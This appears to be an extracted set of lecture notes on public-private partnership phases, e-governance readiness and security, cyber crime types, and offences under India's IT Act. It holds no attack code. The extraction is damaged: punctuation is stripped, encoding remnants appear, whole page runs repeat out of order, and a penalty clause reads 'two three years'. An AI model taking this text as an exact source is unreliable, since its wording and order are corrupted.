Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
